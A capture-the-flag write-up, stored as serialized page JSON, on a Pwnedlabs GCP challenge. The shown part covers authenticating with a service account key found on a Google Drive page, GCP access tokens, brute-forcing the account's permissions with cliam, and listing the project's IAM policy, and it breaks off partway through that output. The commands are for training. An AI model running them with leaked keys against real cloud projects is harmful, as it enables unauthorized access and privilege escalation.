[{"data":1,"prerenderedAt":5245},["ShallowReactive",2],{"content-query-C0TdfTs4KX":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":5239,"_id":5240,"_source":5241,"_file":5242,"_stem":5243,"_extension":5244},"/writeups/pwnedlabs-gcp-challenge","writeups",false,"","Pwnedlabs GCP Challenge",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"This challenge was released as part of a presentation made for the launch of Pwnedlabs' GCRTP bootcamp.","cloud,GCP,Privesc","pwnedlabs-gcp-challenge","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743721051/writeups/pwnedlabs.webp","2025-04-02",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/pwnedlabs-gcp-challenge",{"description":10},{"title":25},"Pwnedlabs GCP Challenge writeup",{"keywords":27},"cloud,GCP,Privesc,writeups,pwnedlabs,ctf",{"type":29,"children":30,"toc":5231},"root",[31,38,45,62,68,73,79,86,93,98,112,154,159,196,202,215,227,232,237,267,284,359,368,400,421,445,451,456,470,586,591,597,602,607,625,630,854,859,1338,1343,1348,1371,1376,1381,1424,1553,1558,1772,1777,1782,1786,1798,1802,1807,1813,1827,1832,1853,1858,1863,1868,1904,2015,2019,2207,2212,2225,2229,2256,2260,2265,2269,2289,2295,2311,2316,2349,2361,2380,2385,2548,2553,2669,2674,2728,2753,2758,2791,2796,2859,2864,3005,3017,3628,3633,4363,4368,4606,4611,4617,4622,4627,4645,4679,4684,5085,5096,5167,5180,5220,5225],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49,51,60],{"type":37,"value":50},"This challenge was released as part of a presentation made for the launch of 
",{"type":32,"tag":52,"props":53,"children":57},"a",{"href":54,"rel":55},"https://pwnedlabs.io/",[56],"nofollow",[58],{"type":37,"value":59},"Pwnedlabs",{"type":37,"value":61},"' GCRTP bootcamp, where the first person to solve the challenge would win a voucher for the bootcamp, and I was lucky enough to get first blood on this challenge.",{"type":32,"tag":39,"props":63,"children":65},{"id":64},"starting-point",[66],{"type":37,"value":67},"Starting Point",{"type":32,"tag":46,"props":69,"children":70},{},[71],{"type":37,"value":72},"We begin our challenge with a URL that redirects us to a Google Drive page containing a GCP key in JSON format.",{"type":32,"tag":74,"props":75,"children":78},"custom-image",{"imgSrc":76,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743698095/writeups/pwnedlabs-gcp-challenge/first-key.webp","1000",[],{"type":32,"tag":80,"props":81,"children":83},"h3",{"id":82},"authentication-methods-for-the-gcloud-sdk",[84],{"type":37,"value":85},"Authentication methods for the gcloud SDK",{"type":32,"tag":87,"props":88,"children":90},"h4",{"id":89},"service-account-key",[91],{"type":37,"value":92},"Service Account Key",{"type":32,"tag":46,"props":94,"children":95},{},[96],{"type":37,"value":97},"This is a JSON file containing credentials for a service account as described in the previous image, it is commonly used in scripts, CI/CD deployments, servers, etc.",{"type":32,"tag":46,"props":99,"children":100},{},[101,103,110],{"type":37,"value":102},"To use the key, we can use the ",{"type":32,"tag":104,"props":105,"children":107},"code",{"className":106},[],[108],{"type":37,"value":109},"gcloud",{"type":37,"value":111}," command line tool to authenticate with the service account using the following command:",{"type":32,"tag":113,"props":114,"children":116},"code-card",{"lang":115},"bash",[117],{"type":32,"tag":118,"props":119,"children":122},"pre",{"className":120,"code":121,"language":115,"meta":7,"style":7},"language-bash shiki 
shiki-themes vitesse-dark","gcloud auth activate-service-account --key-file=key.json\n",[123],{"type":32,"tag":104,"props":124,"children":125},{"__ignoreMap":7},[126],{"type":32,"tag":127,"props":128,"children":131},"span",{"class":129,"line":130},"line",1,[132,137,143,148],{"type":32,"tag":127,"props":133,"children":135},{"style":134},"--shiki-default:#80A665",[136],{"type":37,"value":109},{"type":32,"tag":127,"props":138,"children":140},{"style":139},"--shiki-default:#C98A7D",[141],{"type":37,"value":142}," auth",{"type":32,"tag":127,"props":144,"children":145},{"style":139},[146],{"type":37,"value":147}," activate-service-account",{"type":32,"tag":127,"props":149,"children":151},{"style":150},"--shiki-default:#C99076",[152],{"type":37,"value":153}," --key-file=key.json\n",{"type":32,"tag":46,"props":155,"children":156},{},[157],{"type":37,"value":158},"After authenticating, we can set the project to the one associated with the service account using:",{"type":32,"tag":113,"props":160,"children":161},{"lang":115},[162],{"type":32,"tag":118,"props":163,"children":165},{"className":120,"code":164,"language":115,"meta":7,"style":7},"gcloud config set project gr-proj-4\n",[166],{"type":32,"tag":104,"props":167,"children":168},{"__ignoreMap":7},[169],{"type":32,"tag":127,"props":170,"children":171},{"class":129,"line":130},[172,176,181,186,191],{"type":32,"tag":127,"props":173,"children":174},{"style":134},[175],{"type":37,"value":109},{"type":32,"tag":127,"props":177,"children":178},{"style":139},[179],{"type":37,"value":180}," config",{"type":32,"tag":127,"props":182,"children":183},{"style":139},[184],{"type":37,"value":185}," set",{"type":32,"tag":127,"props":187,"children":188},{"style":139},[189],{"type":37,"value":190}," project",{"type":32,"tag":127,"props":192,"children":193},{"style":139},[194],{"type":37,"value":195}," gr-proj-4\n",{"type":32,"tag":87,"props":197,"children":199},{"id":198},"access-token",[200],{"type":37,"value":201},"Access 
Token",{"type":32,"tag":46,"props":203,"children":204},{},[205,207,213],{"type":37,"value":206},"An Access Token is a temporary access token (generally valid for 1h) used to prove your identity to Google APIs. It has a specific format and will always start with ",{"type":32,"tag":104,"props":208,"children":210},{"className":209},[],[211],{"type":37,"value":212},"ya29.",{"type":37,"value":214},".",{"type":32,"tag":46,"props":216,"children":217},{},[218,220,226],{"type":37,"value":219},"It can be retrieved when connected to the SDK using the command: ",{"type":32,"tag":104,"props":221,"children":223},{"className":222},[],[224],{"type":37,"value":225},"gcloud auth print-access-token",{"type":37,"value":214},{"type":32,"tag":46,"props":228,"children":229},{},[230],{"type":37,"value":231},"Additionally, certain account compromise paths allow us, as a service account, to retrieve an access token from another service account. This will allow us to interact with the compromised account, as we will see later in the writeup.",{"type":32,"tag":46,"props":233,"children":234},{},[235],{"type":37,"value":236},"The access token can be used in two possible ways:",{"type":32,"tag":238,"props":239,"children":240},"ul",{},[241,255],{"type":32,"tag":242,"props":243,"children":244},"li",{},[245,247,253],{"type":37,"value":246},"By interacting directly with Google APIs by specifying it in an ",{"type":32,"tag":104,"props":248,"children":250},{"className":249},[],[251],{"type":37,"value":252},"Authorization bearer",{"type":37,"value":254}," header.",{"type":32,"tag":242,"props":256,"children":257},{},[258,260,265],{"type":37,"value":259},"Or to use it with the ",{"type":32,"tag":104,"props":261,"children":263},{"className":262},[],[264],{"type":37,"value":109},{"type":37,"value":266}," SDK, here are the steps to follow:",{"type":32,"tag":268,"props":269,"children":270},"ol",{},[271],{"type":32,"tag":242,"props":272,"children":273},{},[274,276,282],{"type":37,"value":275},"Set the access 
token in the environment variable ",{"type":32,"tag":104,"props":277,"children":279},{"className":278},[],[280],{"type":37,"value":281},"CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":37,"value":283},":",{"type":32,"tag":113,"props":285,"children":286},{"lang":115},[287],{"type":32,"tag":118,"props":288,"children":290},{"className":120,"code":289,"language":115,"meta":7,"style":7},"export CLOUDSDK_AUTH_ACCESS_TOKEN=ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[291],{"type":32,"tag":104,"props":292,"children":293},{"__ignoreMap":7},[294],{"type":32,"tag":127,"props":295,"children":296},{"class":129,"line":130},[297,303,309,315,320,325,330,334,339,344,349,354],{"type":32,"tag":127,"props":298,"children":300},{"style":299},"--shiki-default:#CB7676",[301],{"type":37,"value":302},"export",{"type":32,"tag":127,"props":304,"children":306},{"style":305},"--shiki-default:#BD976A",[307],{"type":37,"value":308}," CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":32,"tag":127,"props":310,"children":312},{"style":311},"--shiki-default:#666666",[313],{"type":37,"value":314},"=",{"type":32,"tag":127,"props":316,"children":317},{"style":305},[318],{"type":37,"value":319},"ya29",{"type":32,"tag":127,"props":321,"children":323},{"style":322},"--shiki-default:#DBD7CAEE",[324],{"type":37,"value":214},{"type":32,"tag":127,"props":326,"children":327},{"style":305},[328],{"type":37,"value":329},"c",{"type":32,"tag":127,"props":331,"children":332},{"style":322},[333],{"type":37,"value":214},{"type":32,"tag":127,"props":335,"children":336},{"style":305},[337],{"type":37,"value":338},"c0ASRK0Gbjv4",{"type":32,"tag":127,"props":340,"children":341},{"style":311},[342],{"type":37,"value":343},"[",{"type":32,"tag":127,"props":345,"children":346},{"style":322},[347],{"type":37,"value":348},"...SNIP...",{"type":32,"tag":127,"props":350,"children":351},{"style":311},[352],{"type":37,"value":353},"]",{"type":32,"tag":127,"props":355,"children":356},{"style":305},[357],{"type":37,"value":358},"irRX3JRyQrz1rS3xqVc8\
n",{"type":32,"tag":268,"props":360,"children":362},{"start":361},2,[363],{"type":32,"tag":242,"props":364,"children":365},{},[366],{"type":37,"value":367},"Set the project to the one associated with the service account using:",{"type":32,"tag":113,"props":369,"children":370},{"lang":115},[371],{"type":32,"tag":118,"props":372,"children":373},{"className":120,"code":164,"language":115,"meta":7,"style":7},[374],{"type":32,"tag":104,"props":375,"children":376},{"__ignoreMap":7},[377],{"type":32,"tag":127,"props":378,"children":379},{"class":129,"line":130},[380,384,388,392,396],{"type":32,"tag":127,"props":381,"children":382},{"style":134},[383],{"type":37,"value":109},{"type":32,"tag":127,"props":385,"children":386},{"style":139},[387],{"type":37,"value":180},{"type":32,"tag":127,"props":389,"children":390},{"style":139},[391],{"type":37,"value":185},{"type":32,"tag":127,"props":393,"children":394},{"style":139},[395],{"type":37,"value":190},{"type":32,"tag":127,"props":397,"children":398},{"style":139},[399],{"type":37,"value":195},{"type":32,"tag":268,"props":401,"children":403},{"start":402},3,[404,416],{"type":32,"tag":242,"props":405,"children":406},{},[407,409,414],{"type":37,"value":408},"Use the ",{"type":32,"tag":104,"props":410,"children":412},{"className":411},[],[413],{"type":37,"value":109},{"type":37,"value":415}," command as usual, and it will automatically use the access token for authentication.",{"type":32,"tag":242,"props":417,"children":418},{},[419],{"type":37,"value":420},"To unset the access token, you can use the command:",{"type":32,"tag":113,"props":422,"children":423},{"lang":115},[424],{"type":32,"tag":118,"props":425,"children":427},{"className":120,"code":426,"language":115,"meta":7,"style":7},"unset 
CLOUDSDK_AUTH_ACCESS_TOKEN\n",[428],{"type":32,"tag":104,"props":429,"children":430},{"__ignoreMap":7},[431],{"type":32,"tag":127,"props":432,"children":433},{"class":129,"line":130},[434,440],{"type":32,"tag":127,"props":435,"children":437},{"style":436},"--shiki-default:#B8A965",[438],{"type":37,"value":439},"unset",{"type":32,"tag":127,"props":441,"children":442},{"style":139},[443],{"type":37,"value":444}," CLOUDSDK_AUTH_ACCESS_TOKEN\n",{"type":32,"tag":39,"props":446,"children":448},{"id":447},"enumeration",[449],{"type":37,"value":450},"Enumeration",{"type":32,"tag":46,"props":452,"children":453},{},[454],{"type":37,"value":455},"From here, we have no information, so we need to proceed with enumerating our service account. To start, we'll examine what our service account can do and subsequently how our service account can interact with other service accounts.",{"type":32,"tag":46,"props":457,"children":458},{},[459,461,468],{"type":37,"value":460},"With ",{"type":32,"tag":52,"props":462,"children":465},{"href":463,"rel":464},"https://github.com/securisec/cliam",[56],[466],{"type":37,"value":467},"cliam",{"type":37,"value":469}," it is possible to brute force the actions that our service account is capable of performing.",{"type":32,"tag":113,"props":471,"children":472},{"lang":115},[473],{"type":32,"tag":118,"props":474,"children":476},{"className":120,"code":475,"language":115,"meta":7,"style":7},"cliam gcp --service-account=key.json --project-id gr-proj-4 bruteforce\nApr 04 00:34:58 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:35:06 INF ● 
resourcemanager.projects=get-iam-policy\n",[477],{"type":32,"tag":104,"props":478,"children":479},{"__ignoreMap":7},[480,512,556],{"type":32,"tag":127,"props":481,"children":482},{"class":129,"line":130},[483,487,492,497,502,507],{"type":32,"tag":127,"props":484,"children":485},{"style":134},[486],{"type":37,"value":467},{"type":32,"tag":127,"props":488,"children":489},{"style":139},[490],{"type":37,"value":491}," gcp",{"type":32,"tag":127,"props":493,"children":494},{"style":150},[495],{"type":37,"value":496}," --service-account=key.json",{"type":32,"tag":127,"props":498,"children":499},{"style":150},[500],{"type":37,"value":501}," --project-id",{"type":32,"tag":127,"props":503,"children":504},{"style":139},[505],{"type":37,"value":506}," gr-proj-4",{"type":32,"tag":127,"props":508,"children":509},{"style":139},[510],{"type":37,"value":511}," bruteforce\n",{"type":32,"tag":127,"props":513,"children":514},{"class":129,"line":361},[515,520,526,531,536,541,546,551],{"type":32,"tag":127,"props":516,"children":517},{"style":134},[518],{"type":37,"value":519},"Apr",{"type":32,"tag":127,"props":521,"children":523},{"style":522},"--shiki-default:#4C9A91",[524],{"type":37,"value":525}," 04",{"type":32,"tag":127,"props":527,"children":528},{"style":139},[529],{"type":37,"value":530}," 00:34:58",{"type":32,"tag":127,"props":532,"children":533},{"style":139},[534],{"type":37,"value":535}," DBG",{"type":32,"tag":127,"props":537,"children":538},{"style":139},[539],{"type":37,"value":540}," ●",{"type":32,"tag":127,"props":542,"children":543},{"style":139},[544],{"type":37,"value":545}," project=gr-proj-4",{"type":32,"tag":127,"props":547,"children":548},{"style":139},[549],{"type":37,"value":550}," region=us-central1",{"type":32,"tag":127,"props":552,"children":553},{"style":139},[554],{"type":37,"value":555}," 
zone=us-central1-a\n",{"type":32,"tag":127,"props":557,"children":558},{"class":129,"line":402},[559,563,567,572,577,581],{"type":32,"tag":127,"props":560,"children":561},{"style":134},[562],{"type":37,"value":519},{"type":32,"tag":127,"props":564,"children":565},{"style":522},[566],{"type":37,"value":525},{"type":32,"tag":127,"props":568,"children":569},{"style":139},[570],{"type":37,"value":571}," 00:35:06",{"type":32,"tag":127,"props":573,"children":574},{"style":139},[575],{"type":37,"value":576}," INF",{"type":32,"tag":127,"props":578,"children":579},{"style":139},[580],{"type":37,"value":540},{"type":32,"tag":127,"props":582,"children":583},{"style":139},[584],{"type":37,"value":585}," resourcemanager.projects=get-iam-policy\n",{"type":32,"tag":46,"props":587,"children":588},{},[589],{"type":37,"value":590},"After our enumeration we can see that our user can list IAM policies.",{"type":32,"tag":80,"props":592,"children":594},{"id":593},"how-iam-policies-work-on-gcp",[595],{"type":37,"value":596},"How iam policies work on GCP ?",{"type":32,"tag":46,"props":598,"children":599},{},[600],{"type":37,"value":601},"In GCP, an IAM Policy is a set of rules that define who can do what on which resource. 
It controls access by assigning roles to members on specific resources.",{"type":32,"tag":46,"props":603,"children":604},{},[605],{"type":37,"value":606},"An IAM Policy consists of bindings that associate:",{"type":32,"tag":238,"props":608,"children":609},{},[610,615,620],{"type":32,"tag":242,"props":611,"children":612},{},[613],{"type":37,"value":614},"One or more members (users, groups, service accounts)",{"type":32,"tag":242,"props":616,"children":617},{},[618],{"type":37,"value":619},"A role (predefined or custom)",{"type":32,"tag":242,"props":621,"children":622},{},[623],{"type":37,"value":624},"A condition (optional, to restrict access based on criteria)",{"type":32,"tag":46,"props":626,"children":627},{},[628],{"type":37,"value":629},"Here is an example of an IAM Policy (JSON):",{"type":32,"tag":113,"props":631,"children":633},{"lang":632},"json",[634],{"type":32,"tag":118,"props":635,"children":638},{"className":636,"code":637,"language":632,"meta":7,"style":7},"language-json shiki shiki-themes vitesse-dark","{\n  \"role\": \"roles/storage.objectViewer\",\n  \"members\": [\"user:alice@example.com\"],\n  \"condition\": {\n    \"title\": \"TemporaryAccess\",\n    \"expression\": \"request.time \u003C timestamp('2025-01-01T00:00:00Z')\"\n  }\n}\n",[639],{"type":32,"tag":104,"props":640,"children":641},{"__ignoreMap":7},[642,650,693,736,762,801,836,845],{"type":32,"tag":127,"props":643,"children":644},{"class":129,"line":130},[645],{"type":32,"tag":127,"props":646,"children":647},{"style":311},[648],{"type":37,"value":649},"{\n",{"type":32,"tag":127,"props":651,"children":652},{"class":129,"line":361},[653,659,664,669,673,679,684,688],{"type":32,"tag":127,"props":654,"children":656},{"style":655},"--shiki-default:#B8A96577",[657],{"type":37,"value":658},"  
\"",{"type":32,"tag":127,"props":660,"children":661},{"style":436},[662],{"type":37,"value":663},"role",{"type":32,"tag":127,"props":665,"children":666},{"style":655},[667],{"type":37,"value":668},"\"",{"type":32,"tag":127,"props":670,"children":671},{"style":311},[672],{"type":37,"value":283},{"type":32,"tag":127,"props":674,"children":676},{"style":675},"--shiki-default:#C98A7D77",[677],{"type":37,"value":678}," \"",{"type":32,"tag":127,"props":680,"children":681},{"style":139},[682],{"type":37,"value":683},"roles/storage.objectViewer",{"type":32,"tag":127,"props":685,"children":686},{"style":675},[687],{"type":37,"value":668},{"type":32,"tag":127,"props":689,"children":690},{"style":311},[691],{"type":37,"value":692},",\n",{"type":32,"tag":127,"props":694,"children":695},{"class":129,"line":402},[696,700,705,709,713,718,722,727,731],{"type":32,"tag":127,"props":697,"children":698},{"style":655},[699],{"type":37,"value":658},{"type":32,"tag":127,"props":701,"children":702},{"style":436},[703],{"type":37,"value":704},"members",{"type":32,"tag":127,"props":706,"children":707},{"style":655},[708],{"type":37,"value":668},{"type":32,"tag":127,"props":710,"children":711},{"style":311},[712],{"type":37,"value":283},{"type":32,"tag":127,"props":714,"children":715},{"style":311},[716],{"type":37,"value":717}," 
[",{"type":32,"tag":127,"props":719,"children":720},{"style":675},[721],{"type":37,"value":668},{"type":32,"tag":127,"props":723,"children":724},{"style":139},[725],{"type":37,"value":726},"user:alice@example.com",{"type":32,"tag":127,"props":728,"children":729},{"style":675},[730],{"type":37,"value":668},{"type":32,"tag":127,"props":732,"children":733},{"style":311},[734],{"type":37,"value":735},"],\n",{"type":32,"tag":127,"props":737,"children":739},{"class":129,"line":738},4,[740,744,749,753,757],{"type":32,"tag":127,"props":741,"children":742},{"style":655},[743],{"type":37,"value":658},{"type":32,"tag":127,"props":745,"children":746},{"style":436},[747],{"type":37,"value":748},"condition",{"type":32,"tag":127,"props":750,"children":751},{"style":655},[752],{"type":37,"value":668},{"type":32,"tag":127,"props":754,"children":755},{"style":311},[756],{"type":37,"value":283},{"type":32,"tag":127,"props":758,"children":759},{"style":311},[760],{"type":37,"value":761}," {\n",{"type":32,"tag":127,"props":763,"children":765},{"class":129,"line":764},5,[766,771,776,780,784,788,793,797],{"type":32,"tag":127,"props":767,"children":768},{"style":655},[769],{"type":37,"value":770},"    
\"",{"type":32,"tag":127,"props":772,"children":773},{"style":436},[774],{"type":37,"value":775},"title",{"type":32,"tag":127,"props":777,"children":778},{"style":655},[779],{"type":37,"value":668},{"type":32,"tag":127,"props":781,"children":782},{"style":311},[783],{"type":37,"value":283},{"type":32,"tag":127,"props":785,"children":786},{"style":675},[787],{"type":37,"value":678},{"type":32,"tag":127,"props":789,"children":790},{"style":139},[791],{"type":37,"value":792},"TemporaryAccess",{"type":32,"tag":127,"props":794,"children":795},{"style":675},[796],{"type":37,"value":668},{"type":32,"tag":127,"props":798,"children":799},{"style":311},[800],{"type":37,"value":692},{"type":32,"tag":127,"props":802,"children":804},{"class":129,"line":803},6,[805,809,814,818,822,826,831],{"type":32,"tag":127,"props":806,"children":807},{"style":655},[808],{"type":37,"value":770},{"type":32,"tag":127,"props":810,"children":811},{"style":436},[812],{"type":37,"value":813},"expression",{"type":32,"tag":127,"props":815,"children":816},{"style":655},[817],{"type":37,"value":668},{"type":32,"tag":127,"props":819,"children":820},{"style":311},[821],{"type":37,"value":283},{"type":32,"tag":127,"props":823,"children":824},{"style":675},[825],{"type":37,"value":678},{"type":32,"tag":127,"props":827,"children":828},{"style":139},[829],{"type":37,"value":830},"request.time \u003C timestamp('2025-01-01T00:00:00Z')",{"type":32,"tag":127,"props":832,"children":833},{"style":675},[834],{"type":37,"value":835},"\"\n",{"type":32,"tag":127,"props":837,"children":839},{"class":129,"line":838},7,[840],{"type":32,"tag":127,"props":841,"children":842},{"style":311},[843],{"type":37,"value":844},"  }\n",{"type":32,"tag":127,"props":846,"children":848},{"class":129,"line":847},8,[849],{"type":32,"tag":127,"props":850,"children":851},{"style":311},[852],{"type":37,"value":853},"}\n",{"type":32,"tag":46,"props":855,"children":856},{},[857],{"type":37,"value":858},"Listing IAM policies allows us to gain 
more insights into the permissions and names of users or service accounts that could be used - this is important information for exploiting attack paths to another account.",{"type":32,"tag":113,"props":860,"children":861},{"lang":115},[862],{"type":32,"tag":118,"props":863,"children":865},{"className":120,"code":864,"language":115,"meta":7,"style":7},"gcloud projects get-iam-policy gr-proj-4\n\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: projects/gr-proj-4/roles/PaymentsStorage\n- members:\n  - serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n  role: projects/gr-proj-4/roles/Staging2\n- members:\n  - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n  role: roles/analyticshub.viewer\n- members:\n  - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n  role: roles/bigquery.dataViewer\n- members:\n  - serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n  role: roles/cloudsql.viewer\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/compute.viewer\n- members:\n  - user:ian@pwnedlabs.io\n  role: roles/owner\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/run.invoker\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/secretmanager.viewer\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: roles/storage.bucketViewer\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: roles/storage.objectViewer\netag: BwYxzfQaKR4=\nversion: 
1\n",[866],{"type":32,"tag":104,"props":867,"children":868},{"__ignoreMap":7},[869,890,899,912,925,938,949,961,973,985,998,1011,1023,1035,1048,1060,1073,1086,1098,1111,1124,1136,1149,1162,1174,1186,1199,1211,1223,1236,1248,1260,1273,1285,1297,1310,1324],{"type":32,"tag":127,"props":870,"children":871},{"class":129,"line":130},[872,876,881,886],{"type":32,"tag":127,"props":873,"children":874},{"style":134},[875],{"type":37,"value":109},{"type":32,"tag":127,"props":877,"children":878},{"style":139},[879],{"type":37,"value":880}," projects",{"type":32,"tag":127,"props":882,"children":883},{"style":139},[884],{"type":37,"value":885}," get-iam-policy",{"type":32,"tag":127,"props":887,"children":888},{"style":139},[889],{"type":37,"value":195},{"type":32,"tag":127,"props":891,"children":892},{"class":129,"line":361},[893],{"type":32,"tag":127,"props":894,"children":896},{"emptyLinePlaceholder":895},true,[897],{"type":37,"value":898},"\n",{"type":32,"tag":127,"props":900,"children":901},{"class":129,"line":402},[902,907],{"type":32,"tag":127,"props":903,"children":904},{"style":134},[905],{"type":37,"value":906},"-",{"type":32,"tag":127,"props":908,"children":909},{"style":139},[910],{"type":37,"value":911}," members:\n",{"type":32,"tag":127,"props":913,"children":914},{"class":129,"line":738},[915,920],{"type":32,"tag":127,"props":916,"children":917},{"style":134},[918],{"type":37,"value":919},"  -",{"type":32,"tag":127,"props":921,"children":922},{"style":139},[923],{"type":37,"value":924}," serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":926,"children":927},{"class":129,"line":764},[928,933],{"type":32,"tag":127,"props":929,"children":930},{"style":134},[931],{"type":37,"value":932},"  role:",{"type":32,"tag":127,"props":934,"children":935},{"style":139},[936],{"type":37,"value":937}," 
projects/gr-proj-4/roles/PaymentsStorage\n",{"type":32,"tag":127,"props":939,"children":940},{"class":129,"line":803},[941,945],{"type":32,"tag":127,"props":942,"children":943},{"style":134},[944],{"type":37,"value":906},{"type":32,"tag":127,"props":946,"children":947},{"style":139},[948],{"type":37,"value":911},{"type":32,"tag":127,"props":950,"children":951},{"class":129,"line":838},[952,956],{"type":32,"tag":127,"props":953,"children":954},{"style":134},[955],{"type":37,"value":919},{"type":32,"tag":127,"props":957,"children":958},{"style":139},[959],{"type":37,"value":960}," serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":962,"children":963},{"class":129,"line":847},[964,968],{"type":32,"tag":127,"props":965,"children":966},{"style":134},[967],{"type":37,"value":932},{"type":32,"tag":127,"props":969,"children":970},{"style":139},[971],{"type":37,"value":972}," projects/gr-proj-4/roles/Staging2\n",{"type":32,"tag":127,"props":974,"children":976},{"class":129,"line":975},9,[977,981],{"type":32,"tag":127,"props":978,"children":979},{"style":134},[980],{"type":37,"value":906},{"type":32,"tag":127,"props":982,"children":983},{"style":139},[984],{"type":37,"value":911},{"type":32,"tag":127,"props":986,"children":988},{"class":129,"line":987},10,[989,993],{"type":32,"tag":127,"props":990,"children":991},{"style":134},[992],{"type":37,"value":919},{"type":32,"tag":127,"props":994,"children":995},{"style":139},[996],{"type":37,"value":997}," serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":999,"children":1001},{"class":129,"line":1000},11,[1002,1006],{"type":32,"tag":127,"props":1003,"children":1004},{"style":134},[1005],{"type":37,"value":932},{"type":32,"tag":127,"props":1007,"children":1008},{"style":139},[1009],{"type":37,"value":1010}," 
roles/analyticshub.viewer\n",{"type":32,"tag":127,"props":1012,"children":1014},{"class":129,"line":1013},12,[1015,1019],{"type":32,"tag":127,"props":1016,"children":1017},{"style":134},[1018],{"type":37,"value":906},{"type":32,"tag":127,"props":1020,"children":1021},{"style":139},[1022],{"type":37,"value":911},{"type":32,"tag":127,"props":1024,"children":1026},{"class":129,"line":1025},13,[1027,1031],{"type":32,"tag":127,"props":1028,"children":1029},{"style":134},[1030],{"type":37,"value":919},{"type":32,"tag":127,"props":1032,"children":1033},{"style":139},[1034],{"type":37,"value":997},{"type":32,"tag":127,"props":1036,"children":1038},{"class":129,"line":1037},14,[1039,1043],{"type":32,"tag":127,"props":1040,"children":1041},{"style":134},[1042],{"type":37,"value":932},{"type":32,"tag":127,"props":1044,"children":1045},{"style":139},[1046],{"type":37,"value":1047}," roles/bigquery.dataViewer\n",{"type":32,"tag":127,"props":1049,"children":1051},{"class":129,"line":1050},15,[1052,1056],{"type":32,"tag":127,"props":1053,"children":1054},{"style":134},[1055],{"type":37,"value":906},{"type":32,"tag":127,"props":1057,"children":1058},{"style":139},[1059],{"type":37,"value":911},{"type":32,"tag":127,"props":1061,"children":1063},{"class":129,"line":1062},16,[1064,1068],{"type":32,"tag":127,"props":1065,"children":1066},{"style":134},[1067],{"type":37,"value":919},{"type":32,"tag":127,"props":1069,"children":1070},{"style":139},[1071],{"type":37,"value":1072}," serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":1074,"children":1076},{"class":129,"line":1075},17,[1077,1081],{"type":32,"tag":127,"props":1078,"children":1079},{"style":134},[1080],{"type":37,"value":932},{"type":32,"tag":127,"props":1082,"children":1083},{"style":139},[1084],{"type":37,"value":1085}," 
roles/cloudsql.viewer\n",{"type":32,"tag":127,"props":1087,"children":1089},{"class":129,"line":1088},18,[1090,1094],{"type":32,"tag":127,"props":1091,"children":1092},{"style":134},[1093],{"type":37,"value":906},{"type":32,"tag":127,"props":1095,"children":1096},{"style":139},[1097],{"type":37,"value":911},{"type":32,"tag":127,"props":1099,"children":1101},{"class":129,"line":1100},19,[1102,1106],{"type":32,"tag":127,"props":1103,"children":1104},{"style":134},[1105],{"type":37,"value":919},{"type":32,"tag":127,"props":1107,"children":1108},{"style":139},[1109],{"type":37,"value":1110}," serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":32,"tag":127,"props":1112,"children":1114},{"class":129,"line":1113},20,[1115,1119],{"type":32,"tag":127,"props":1116,"children":1117},{"style":134},[1118],{"type":37,"value":932},{"type":32,"tag":127,"props":1120,"children":1121},{"style":139},[1122],{"type":37,"value":1123}," roles/compute.viewer\n",{"type":32,"tag":127,"props":1125,"children":1127},{"class":129,"line":1126},21,[1128,1132],{"type":32,"tag":127,"props":1129,"children":1130},{"style":134},[1131],{"type":37,"value":906},{"type":32,"tag":127,"props":1133,"children":1134},{"style":139},[1135],{"type":37,"value":911},{"type":32,"tag":127,"props":1137,"children":1139},{"class":129,"line":1138},22,[1140,1144],{"type":32,"tag":127,"props":1141,"children":1142},{"style":134},[1143],{"type":37,"value":919},{"type":32,"tag":127,"props":1145,"children":1146},{"style":139},[1147],{"type":37,"value":1148}," user:ian@pwnedlabs.io\n",{"type":32,"tag":127,"props":1150,"children":1152},{"class":129,"line":1151},23,[1153,1157],{"type":32,"tag":127,"props":1154,"children":1155},{"style":134},[1156],{"type":37,"value":932},{"type":32,"tag":127,"props":1158,"children":1159},{"style":139},[1160],{"type":37,"value":1161}," 
